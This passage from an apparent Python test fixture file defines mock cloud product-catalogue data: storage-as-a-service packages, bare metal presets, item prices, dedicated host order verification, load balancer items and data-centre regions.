'categories': [ {'categoryCode': 'performance_storage_space'} ], 'id': 40682, 'locationGroupId': '' } ] }, { 'capacity': '1000', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE', 'prices': [ { 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'id': 40742, 'locationGroupId': '' } ] }, { 'capacity': '800', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'keyName': '800_IOPS_4', 'prices': [ { 'capacityRestrictionMaximum': '1000', 'capacityRestrictionMinimum': '100', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 41562, 'locationGroupId': '' } ] }, { 'capacity': '1000', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'keyName': '1000_IOPS', 'prices': [ { 'capacityRestrictionMaximum': '20', 'capacityRestrictionMinimum': '20', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 40882, 'locationGroupId': '' } ] } ] } SAAS_PACKAGE = { 'categories': [ {'categoryCode': 'storage_as_a_service'} ], 'id': 759, 'name': 'Storage As A Service (StaaS)', 'items': [ { 'capacity': '0', 'keyName': '', 'prices': [ { 'id': 189433, 'categories': [ {'categoryCode': 'storage_as_a_service'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'keyName': '', 'prices': [ { 'categories': [ {'categoryCode': 'storage_block'} ], 'id': 189443, 'locationGroupId': '' } ] }, { 'capacity': '0', 'keyName': '', 'prices': [ { 'categories': [ {'categoryCode': 'storage_file'} ], 'id': 189453, 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '999', 'capacityMinimum': '500', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '500_999_GBS', 'prices': [ { 'id': 189993, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '1999', 'capacityMinimum': '1000', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '1000_1999_GBS', 'prices': [ { 'id': 190113, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '12000', 'capacityMinimum': '1', 'keyName': 'STORAGE_SPACE_FOR_2_IOPS_PER_GB', 'prices': [ { 'id': 193433, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '12000', 'capacityMinimum': '1', 'keyName': 'STORAGE_SPACE_FOR_4_IOPS_PER_GB', 'prices': [ { 'id': 194763, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '10000', 'capacityMinimum': '100', 'keyName': '', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'prices': [ { 'capacityRestrictionMaximum': '999', 'capacityRestrictionMinimum': '500', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 190053, 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '20000', 'capacityMinimum': '100', 'keyName': '', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'prices': [ { 'capacityRestrictionMaximum': '1999', 'capacityRestrictionMinimum': '1000', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 190173, 'locationGroupId': '' } ] }, { 'capacity': '200', 'itemCategory': {'categoryCode': 'storage_tier_level'}, 'keyName': '', 'prices': [ { 'id': 193373, 'categories': [ {'categoryCode': 'storage_tier_level'} ], 'locationGroupId': '' } ] }, { 'capacity': '300', 'itemCategory': {'categoryCode': 'storage_tier_level'}, 'keyName': '', 'prices': [ { 'id': 194703, 'categories': [ {'categoryCode': 'storage_tier_level'} ], 'locationGroupId': '' } ] }, { 'capacity': '10', 'keyName': '', 'prices': [ { 'capacityRestrictionMaximum': '48000', 'capacityRestrictionMinimum': '100', 'capacityRestrictionType': 'IOPS', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 191193, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 193613, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '300', 'capacityRestrictionMinimum': '300', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 194943, 'locationGroupId': ''}] }, { 'capacity': '20', 'keyName': '', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 193853, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': { 'categoryCode': 'performance_storage_replication' }, 'keyName': 'REPLICATION_FOR_IOPSBASED_PERFORMANCE', 'prices': [ { 'capacityRestrictionMaximum': '48000', 'capacityRestrictionMinimum': '1', 'capacityRestrictionType': 'IOPS', 'categories': [ {'categoryCode': 'performance_storage_replication'} ], 'id': 192033, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': { 'categoryCode': 'performance_storage_replication' }, 'keyName': 'REPLICATION_FOR_TIERBASED_PERFORMANCE', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_replication'} ], 'id': 194693, 'locationGroupId': '' } ] } ] } SAAS_REST_PACKAGE = { 'categories': [ {'categoryCode': 'storage_as_a_service'} ], 'id': 759, 'name': 'Storage As A Service (StaaS)', 'items': [ { 'capacity': '0', 'keyName': '', 'prices': [ { 'id': 189433, 'categories': [ {'categoryCode': 'storage_as_a_service'} ], 'locationGroupId': None } ] }, { 'capacity': '20', 'keyName': '', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 193853, 'locationGroupId': None } ] }, { 'capacity': '0', 'capacityMaximum': '1999', 'capacityMinimum': '1000', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '1000_1999_GBS', 'prices': [ { 'id': 190113, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': None } ] }, { 'capacity': '0', 'capacityMaximum': '20000', 'capacityMinimum': '100', 'keyName': '', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'prices': [ { 'capacityRestrictionMaximum': '1999', 'capacityRestrictionMinimum': '1000', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 190173, 'locationGroupId': None } ] }, { 'capacity': '0', 'keyName': '', 'prices': [ { 'categories': [ {'categoryCode': 'storage_file'} ], 'id': 189453, 'locationGroupId': None } ] } ] } activePreset1 = { 'description': 'Single Xeon 1270, 8GB Ram, 2x1TB SATA disks, Non-RAID', 'id': 64, 'isActive': '1', 'keyName': 'S1270_8GB_2X1TBSATA_NORAID', 'name': 'S1270 8GB 2X1TBSATA NORAID', 'packageId': 200, 'prices': [ { "hourlyRecurringFee": "1.18", "id": 165711, "locationGroupId": '', "recurringFee": "780", } ] } activePreset2 = { 'description': 'Dual Xeon Gold, 384GB Ram, 4x960GB SSD, RAID 10', 'id': 65, 'isActive': '1', 'keyName': 'DGOLD_6140_384GB_4X960GB_SSD_SED_RAID_10', 'name': 'DGOLD 6140 384GB 4X960GB SSD SED RAID 10', 'packageId': 200, 'prices': [ { "hourlyRecurringFee": "1.18", "id": 165711, "locationGroupId": '', "recurringFee": "780", } ] } getAllObjects = [{ 'activePresets': [activePreset1], 'accountRestrictedActivePresets': [activePreset2], 'description': 'Bare Metal Server', 'firstOrderStepId': 1, 'id': 200, 'isActive': 1, 'items': HARDWARE_ITEMS, 'name': 'Bare Metal Server', 'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.', 'keyname': 'WASHINGTON_DC', 'location': {'location': {'id': 37473, 'longName': 'Washington 1', 'name': 'wdc01'}}, 'sortOrder': 10}], 'subDescription': 'Bare Metal Server', 'unitSize': 1, "itemPrices": [ { "hourlyRecurringFee": ".027", "id": 205911, "laborFee": "0", "locationGroupId": 505, "capacityRestrictionMaximum": "40", "capacityRestrictionMinimum": "40", "capacityRestrictionType": "CORE", "item": { "capacity": "0", "description": "Load Balancer Uptime", "id": 10785, "keyName": "LOAD_BALANCER_UPTIME", } }, { "hourlyRecurringFee": "0", "id": 199467, "laborFee": "0", "locationGroupId": '', "recurringFee": "0", "item": { "capacity": "0", "description": "Load Balancer Bandwidth", "id": 10051, "keyName": "LOAD_BALANCER_BANDWIDTH", } }, { "hourlyRecurringFee": ".028", "id": 205913, "laborFee": "0", "locationGroupId": 507, "item": { "capacity": "0", "description": "Load Balancer Uptime", "id": 10785, "keyName": "LOAD_BALANCER_UPTIME", } }] }] getItems = [ { 'id': 1234, 'keyName': 'KeyName01', 'capacity': '1000', 'description': 'Public & Private Networks', 'itemCategory': {'categoryCode': 'Uplink Port Speeds'}, 'softwareDescription': { 'id': 1228, 'longDescription': 'Redhat EL 5.10-64', 'referenceCode': 'REDHAT_5_64' }, 'prices': [{'id': 1122, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10, 'categories': [{'id': 26, 'name': 'Uplink Port Speeds', 'categoryCode': 'port_speed'}]}], }, { 'id': 2233, 'keyName': 'KeyName02', 'capacity': '1000', 'description': 'Public & Private Networks', 'itemCategory': {'categoryCode': 'Uplink Port Speeds'}, 'prices': [{'id': 4477, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10, 'categories': [{'id': 26, 'name': 'Uplink Port Speeds', 'categoryCode': 'port_speed'}]}], }, { 'id': 1239, 'keyName': 'KeyName03', 'capacity': '2', 'description': 'RAM', 'itemCategory': {'categoryCode': 'RAM'}, 'prices': [{'id': 1133, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 3, 'name': 'RAM', 'categoryCode': 'ram'}]}], }, { 'id': 1240, 'keyName': 'KeyName014', 'capacity': '4', 'units': 'PRIVATE_CORE', 'description': 'Computing Instance (Dedicated)', 'itemCategory': {'categoryCode': 'Computing Instance'}, 'prices': [{'id': 1007, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 80, 'name': 'Computing Instance', 'categoryCode': 'guest_core'}]}], }, { 'id': 1250, 'keyName': 'KeyName015', 'capacity': '4', 'units': 'CORE', 'description': 'Computing Instance', 'itemCategory': {'categoryCode': 'Computing Instance'}, 'prices': [{'id': 1144, 'locationGroupId': None, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10, 'categories': [{'id': 80, 'name': 'Computing Instance', 'categoryCode': 'guest_core'}]}], }, { 'id': 112233, 'keyName': 'KeyName016', 'capacity': '55', 'units': 'CORE', 'description': 'Computing Instance', 'itemCategory': {'categoryCode': 'Computing Instance'}, 'prices': [{'id': 332211, 'locationGroupId': 1, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 80, 'name': 'Computing Instance', 'categoryCode': 'guest_core'}]}], }, { 'id': 4439, 'keyName': 'KeyName017', 'capacity': '1', 'description': '1 GB iSCSI Storage', 'itemCategory': {'categoryCode': 'iscsi'}, 'prices': [{'id': 2222, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, { 'id': 1121, 'keyName': 'KeyName081', 'capacity': '20', 'description': '20 GB iSCSI snapshot', 'itemCategory': {'categoryCode': 'iscsi_snapshot_space'}, 'prices': [{'id': 2014, 'hourlyRecurringFee': 0.10}], }, { 'id': 4440, 'keyName': 'KeyName019', 'capacity': '4', 'description': '4 Portable Public IP Addresses', 'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'}, 'prices': [{'id': 4444, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, { 'id': 8880, 'keyName': 'KeyName0199', 'capacity': '8', 'description': '8 Portable Public IP Addresses', 'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'}, 'prices': [{'id': 8888, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, { 'id': 44400, 'keyName': 'KeyName0155', 'capacity': '4', 'description': '4 Portable Private IP Addresses', 'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'}, 'prices': [{'id': 44441, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, { 'id': 88800, 'keyName': 'KeyName0144', 'capacity': '8', 'description': '8 Portable Private IP Addresses', 'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'}, 'prices': [{'id': 88881, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}], }, { 'id': 10, 'keyName': 'KeyName0341', 'capacity': '0', 'description': 'Global IPv4', 'itemCategory': {'categoryCode': 'global_ipv4'}, 'prices': [{'id': 11, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}], }, { 'id': 66464, 'keyName': '1_IPV6_ADDRESS', 'capacity': '64', 'description': '/64 Block Portable Public IPv6 Addresses', 'itemCategory': {'categoryCode': 'static_ipv6_addresses'}, 'prices': [{'id': 664641, 'hourlyRecurringFee': '0', 'locationGroupId': '', 'recurringFee': '0'}], }, { 'id': 610, 'keyName': 'KeyName031', 'capacity': '0', 'description': 'Global IPv6', 'itemCategory': {'categoryCode': 'global_ipv6'}, 'prices': [{'id': 611, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, {'attributes': [], 'capacity': '0', 'description': '0 GB Bandwidth', 'itemCategory': {'categoryCode': 'bandwidth', 'id': 10}, 'keyName': 'BANDWIDTH_0_GB_2', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 1800, "locationGroupId": '', 'itemId': 439, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'setupFee': '0', 'sort': 99}]}, {'attributes': [], 'capacity': '10', 'description': '10 Mbps Public & Private Network Uplinks', 'itemCategory': {'categoryCode': 'port_speed', 'id': 26}, 'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 272, "locationGroupId": '', 'itemId': 186, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 5}]}, {'attributes': [], 'capacity': '0', 'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)', 'itemCategory': {'categoryCode': 'os', 'id': 12}, 'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0.10', 'id': 37650, "locationGroupId": '', 'itemId': 4702, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0.1', 'setupFee': '0.1', 'sort': 9}], 'softwareDescription': {'id': 1362, 'longDescription': 'Ubuntu / 14.04-64', 'referenceCode': 'UBUNTU_14_64'}} ] getItemPricesISCSI = [ { 'currentPriceFlag': '', 'id': 2152, 'item': { 'capacity': '1', 'description': '1 GB iSCSI SAN Storage', 'id': 1111, 'softwareDescriptionId': '', 'units': 'GB', 'upgradeItemId': 547}, 'itemId': 1111, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'packageReferences': [{'id': 46626, 'itemPriceId': 2152, 'packageId': 0}], 'quantity': '', 'recurringFee': '.35', 'setupFee': '0', 'sort': 0 }, { 'currentPriceFlag': '', 'id': 22501, 'item': {'capacity': '1', 'description': '1 GB iSCSI SAN Storage', 'id': 1111, 'softwareDescriptionId': '', 'units': 'GB', 'upgradeItemId': 547}, 'itemId': 1111, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'packageReferences': [{ 'id': 252983, 'itemPriceId': 22501, 'packageId': 0 }], 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0 }, { 'currentPriceFlag': '', 'id': 22441, 'item': { 'capacity': '1', 'description': '1 GB iSCSI SAN Storage', 'id': 1111, 'softwareDescriptionId': '', 'units': 'GB', 'upgradeItemId': 547 }, 'itemId': 1111, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'packageReferences': [{'id': 250326, 'itemPriceId': 22441, 'packageId': 0}], 'quantity': '', 'recurringFee': '15', 'setupFee': '0', 'sort': 0 }] getItemsVS = [ { 'id': 1234, 'keyName': 'KeyName01', 'capacity': '1000', 'description': 'Public & Private Networks', 'itemCategory': {'categoryCode': 'Uplink Port Speeds'}, 'softwareDescription': { 'id': 1228, 'longDescription': 'Redhat EL 5.10-64', 'referenceCode': 'REDHAT_5_64' }, 'prices': [{'id': 1122, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 26, 'name': 'Uplink Port Speeds', 'categoryCode': 'port_speed'}]}], }, { 'id': 2233, 'keyName': 'KeyName02', 'capacity': '1000', 'description': 'Public & Private Networks', 'itemCategory': {'categoryCode': 'Uplink Port Speeds'}, 'prices': [{'id': 4477, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 26, 'name': 'Uplink Port Speeds', 'categoryCode': 'port_speed'}]}], }, { 'id': 1239, 'keyName': 'KeyName03', 'capacity': '2', 'description': 'RAM', 'itemCategory': {'categoryCode': 'RAM'}, 'prices': [{'id': 1133, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 3, 'name': 'RAM', 'categoryCode': 'ram'}]}], } ] verifyOrderDH = { 'preTaxSetup': '0', 'storageGroups': [], 'postTaxRecurring': '3.164', 'billingOrderItemId': '', 'presetId': '', 'hardware': [ { 'domain': 't.com', 'hostname': 't', 'bareMetalInstanceFlag': '', 'hardwareStatusId': '', 'primaryBackendNetworkComponent': { 'router': { 'id': 51218 }, 'networkVlanId': '' }, 'accountId': '' } ], 'prices': [ { 'itemId': 10195, 'setupFee': '0', 'recurringFee': '0', 'hourlyRecurringFee': '3.164', 'oneTimeFee': '0', 'id': 200269, 'item': { 'thirdPartyPolicyAssignments': [], 'capacity': '56', 'description': '56 Cores X 242 RAM X 1.2 TB', 'bundle': [ { 'category': { 'categoryCode': 'dedicated_host_ram', 'id': 850, 'name': 'Dedicated Host RAM' }, 'itemPriceId': 200301, 'itemPrice': { 'itemId': 10199, 'setupFee': '0', 'recurringFee': '0', 'hourlyRecurringFee': '0', 'oneTimeFee': '0', 'id': 200301, 'laborFee': '0' }, 'bundleItemId': 10195, 'bundleItem': { 'units': 'CORE', 'keyName': '56_CORES_X_242_RAM_X_1_4_TB', 'capacity': '56', 'description': '56 Cores X 242 RAM X 1.2 TB', 'id': 10195 }, 'id': 41763 }, { 'category': { 'categoryCode': 'dedicated_host_disk', 'id': 851, 'name': 'Dedicated Host Disk' }, 'itemPriceId': 200299, 'itemPrice': { 'itemId': 10197, 'setupFee': '0', 'recurringFee': '0', 'hourlyRecurringFee': '0', 'oneTimeFee': '0', 'id': 200299, 'laborFee': '0' }, 'bundleItemId': 10195, 'bundleItem': { 'units': 'CORE', 'keyName': '56_CORES_X_242_RAM_X_1_4_TB', 'capacity': '56', 'description': '56 Cores X 242 RAM X 1.2 TB', 'id': 10195 }, 'id': 41761 } ], 'keyName': '56_CORES_X_242_RAM_X_1_4_TB', 'units': 'CORE', 'id': 10195 }, 'laborFee': '0', 'categories': [ { 'categoryCode': 'dedicated_virtual_hosts', 'id': 848, 'name': 'Dedicated Host' } ] } ], 'sendQuoteEmailFlag': '', 'packageId': 813, 'useHourlyPricing': True, 'preTaxRecurringMonthly': '0', 'message': '', 'preTaxRecurring': '3.164', 'primaryDiskPartitionId': '', 'locationObject': { 'id': 138124, 'name': 'dal05', 'longName': 'Dallas 5' }, 'taxCompletedFlag': False, 'isManagedOrder': '', 'imageTemplateId': '', 'postTaxRecurringMonthly': '0', 'resourceGroupTemplateId': '', 'postTaxSetup': '0', 'sshKeys': [], 'location': '138124', 'stepId': '', 'proratedInitialCharge': '0', 'totalRecurringTax': '0', 'paymentType': '', 'resourceGroupId': '', 'sourceVirtualGuestId': '', 'bigDataOrderFlag': False, 'extendedHardwareTesting': '', 'preTaxRecurringHourly': '3.164', 'postTaxRecurringHourly': '3.164', 'currencyShortName': 'USD', 'containerSplHash': '000000003699c54000007f38ef8b0102', 'proratedOrderTotal': '0', 'serverCoreCount': '', 'privateCloudOrderFlag': False, 'totalSetupTax': '0', 'quantity': 1 } itemsLoadbal = [ { "capacity": "0", "description": "Load Balancer as a Service", "id": 10043, "keyName": "LOAD_BALANCER_AS_A_SERVICE", "itemCategory": { "categoryCode": "load_balancer_as_a_service", "id": 1116, "name": "Load Balancer As A Service", }, "prices": [ { "hourlyRecurringFee": "0", "id": 199447, "locationGroupId": '', "recurringFee": "0", } ] }, { "capacity": "0", "description": "Load Balancer Uptime", "id": 10785, "keyName": "LOAD_BALANCER_UPTIME", "itemCategory": { "categoryCode": "load_balancer_uptime", "id": 1119, "name": "Load Balancer Uptime", }, "prices": [ { "hourlyRecurringFee": ".028", "id": 205913, "locationGroupId": 507, }]} ] regionsLoadbal = [{'description': 'WDC01 - Washington, DC - East Coast U.S.', 'keyname': 'WASHINGTON_DC', 'location': {'location': {'id': 37473, 'longName': 'Washington 1', 'name': 'wdc01', "groups": [ { "description": "Location Group 4", "id": 507, "locationGroupTypeId": 82, "name": "Location Group 4", "locationGroupType": { "name": "PRICING" } }, { "description": "COS Cross Region - EU", "id": 1303, "locationGroupTypeId": 82, "name": "eu", "locationGroupType": { "name": "PRICING" } }, { "description": "COS Regional Frankfurt", "id": 1783, "locationGroupTypeId": 82, "name": "eu-de", "locationGroupType": { "name": "PRICING" } } ] }}, 'sortOrder': 10}] getAllObjectsLoadbal = [ { "id": 805, "keyName": "LBAAS", "name": "Load Balancer As A Service (LBaaS)", "items": itemsLoadbal, "regions": regionsLoadbal } ] getAllObjectsDH = [{ "subDescription": "Dedicated Host", "name": "Dedicated Host", "items": [{ "capacity": "56", "description": "56 Cores X 242 RAM X 1.2 TB", "bundleItems": [ { "capacity": "1200", "keyName": "1_4_TB_LOCAL_STORAGE_DEDICATED_HOST_CAPACITY", "categories": [{ "categoryCode": "dedicated_host_disk" }] }, { "capacity": "242", "keyName": "242_GB_RAM", "categories": [{ "categoryCode": "dedicated_host_ram" }] } ], "prices": [ { "itemId": 10195, "setupFee": "0", "recurringFee": "2099", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.164", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200269, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": "", "quantity": "" }, { "itemId": 10195, "setupFee": "0", "recurringFee": "2161.97", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.258", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200271, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": 503, "quantity": "" } ], "keyName": "56_CORES_X_242_RAM_X_1_4_TB", "id": 10195, "itemCategory": { "categoryCode": "dedicated_virtual_hosts" } }], "keyName": "DEDICATED_HOST", "unitSize": "", "regions": [{ "location": { "locationPackageDetails": [{ "isAvailable": 1, "locationId": 138124, "packageId": 813 }], "location": { "statusId": 2, "priceGroups": [{ "locationGroupTypeId": 82, "description": "CDN - North America - Akamai", "locationGroupType": { "name": "PRICING" }, "securityLevelId": "", "id": 1463, "name": "NORTH-AMERICA-AKAMAI" }], "id": 138124, "name": "dal05", "longName": "Dallas 5" } }, "keyname": "DALLAS05", "description": "DAL05 - Dallas", "sortOrder": 12 }], "firstOrderStepId": "", "id": 813, "isActive": 1, "description": "Dedicated Host" }] getAllObjectsDHGpu = [{ "subDescription": "Dedicated Host", "name": "Dedicated Host", "items": [{ "capacity": "56", "description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]", "bundleItems": [ { "capacity": "1200", "keyName": "1.2 TB Local Storage (Dedicated Host Capacity)", "categories": [{ "categoryCode": "dedicated_host_disk" }] }, { "capacity": "242", "keyName": "2_GPU_P100_DEDICATED", "hardwareGenericComponentModel": { "capacity": "16", "id": 849, "hardwareComponentType": { "id": 20, "keyName": "GPU" } }, "categories": [{ "categoryCode": "dedicated_host_ram" }] } ], "prices": [ { "itemId": 10195, "setupFee": "0", "recurringFee": "2099", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.164", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200269, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": "", "quantity": "" }, { "itemId": 10195, "setupFee": "0", "recurringFee": "2161.97", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.258", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200271, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": 503, "quantity": "" } ], "keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100", "id": 10195, "itemCategory": { "categoryCode": "dedicated_virtual_hosts" } }], "keyName": "DEDICATED_HOST", "unitSize": "", "regions": [{ "location": { "locationPackageDetails": [{ "isAvailable": 1, "locationId": 138124, "packageId": 813 }], "location": { "statusId": 2, "priceGroups": [{ "locationGroupTypeId": 82, "description": "CDN - North America - Akamai", "locationGroupType": { "name": "PRICING" }, "securityLevelId": "", "id": 1463, "name": "NORTH-AMERICA-AKAMAI" }], "id": 138124, "name": "dal05", "longName": "Dallas 5" } }, "keyname": "DALLAS05", "description": "DAL05 - Dallas", "sortOrder": 12 }], "firstOrderStepId": "", "id": 813, "isActive": 1, "description": "Dedicated Host" }] getRegions = [{ "description": "WDC07 - Washington, DC", "keyname": "WASHINGTON07", "location": { "locationId": 2017603, "location": { "id": 2017603, "longName": "Washington 7", "name": "wdc07", "priceGroups": [ { "description": "COS Regional - US East", "id": 1305, "locationGroupTypeId": 82, "name": "us-east", "locationGroupType": { "name": "PRICING" } } ] } }, "locations": [{ "location": { "euCompliantFlag": False, "id": 2017603, "longName": "Washington 7", "name": "wdc07", "statusId": 2}, "locationPackageDetails": [{ "isAvailable": 1, "locationId": 2017603, "packageId": 46 }] }] }] getItemPrices = [ { "hourlyRecurringFee": ".093", "id": 204015, "recurringFee": "62", "categories": [ { "categoryCode": "guest_core" } ], "item": { "description": "4 x 2.0 GHz or higher Cores", "id": 859, "keyName": "GUEST_CORES_4", }, "pricingLocationGroup": { "id": 503, "locations": [ { "id": 449610, "longName": "Montreal 1", "name": "mon01", "statusId": 2, "regions": [ { "description": "MON01 - Montreal", "keyname": "MONTREAL", "sortOrder": 94 } ] }, { "id": 449618, "longName": "Montreal 2", "name": "mon02", "statusId": 2 }, { "id": 448994, "longName": "Toronto 1", "name": "tor01", "statusId": 2 }, { "id": 350993, "longName": "Toronto 2", "name": "tor02", "statusId": 2 }, { "id": 221894, "longName": "Amsterdam 2", "name": "ams02", "statusId": 2, "regions": [ { "description": "AMS02 POP - Amsterdam", "keyname": "AMSTERDAM02", "sortOrder": 12 } ] }, { "id": 265592, "longName": "Amsterdam 1", "name": "ams01", "statusId": 2 }, { "id": 814994, "longName": "Amsterdam 3", "name": "ams03", "statusId": 2 } ] } }, { "hourlyRecurringFee": ".006", "id": 204663, "recurringFee": "4.1", "item": { "description": "100 GB (LOCAL)", "id": 3899, "keyName": "GUEST_DISK_100_GB_LOCAL_3", }, "pricingLocationGroup": { "id": 503, "locations": [ { "id": 449610, "longName": "Montreal 1", "name": "mon01", "statusId": 2 }, { "id": 449618, "longName": "Montreal 2", "name": "mon02", "statusId": 2 }, { "id": 448994, "longName": "Toronto 1", "name": "tor01", "statusId": 2 }, { "id": 350993, "longName": "Toronto 2", "name": "tor02", "statusId": 2 }, { "id": 221894, "longName": "Amsterdam 2", "name": "ams02", "statusId": 2 }, { "id": 265592, "longName": "Amsterdam 1", "name": "ams01", "statusId": 2 }, { "id": 814994, "longName": "Amsterdam 3", "name": "ams03", "statusId": 2 } ] } }, { "hourlyRecurringFee": ".217", "id": 204255, "recurringFee": "144", "item": { "description": "16 GB ", "id": 1017, "keyName": "RAM_16_GB", }, "pricingLocationGroup": { "id": 503, "locations": [ { "id": 449610, "longName": "Montreal 1", "name": "mon01", "statusId": 2 }, { "id": 449618, "longName": "Montreal 2", "name": "mon02", "statusId": 2 }, { "id": 448994, "longName": "Toronto 1", "name": "tor01", "statusId": 2 }, { "id": 350993, "longName": "Toronto 2", "name": "tor02", "statusId": 2 }, { "id": 221894, "longName": "Amsterdam 2", "name": "ams02", "statusId": 2 }, { "id": 265592, "longName": "Amsterdam 1", "name": "ams01", "statusId": 2 }, { "id": 814994, "longName": "Amsterdam 3", "name": "ams03", "statusId": 2 } ] } } ] getActivePresets = [ { "description": "M1.64x512x25", "id": 799, "isActive": "1", "keyName": "M1_64X512X25", "name": "M1.64x512x25", "packageId": 835 }, { "description": "M1.56x448x100", "id": 797, "isActive": "1", "keyName": "M1_56X448X100", "name": "M1.56x448x100", "packageId": 835 }, { "description": "M1.64x512x100", "id": 801, "isActive": "1", "keyName": "M1_64X512X100", "name": "M1.64x512x100", "packageId": 835 } ] getAccountRestrictedActivePresets = [] RESERVED_CAPACITY = [{"id": 1059}] getItems_RESERVED_CAPACITY = [ { 'id': 12273, 'keyName': 'B1_1X2_1_YEAR_TERM', 'description': 'B1 1x2 1 year term', 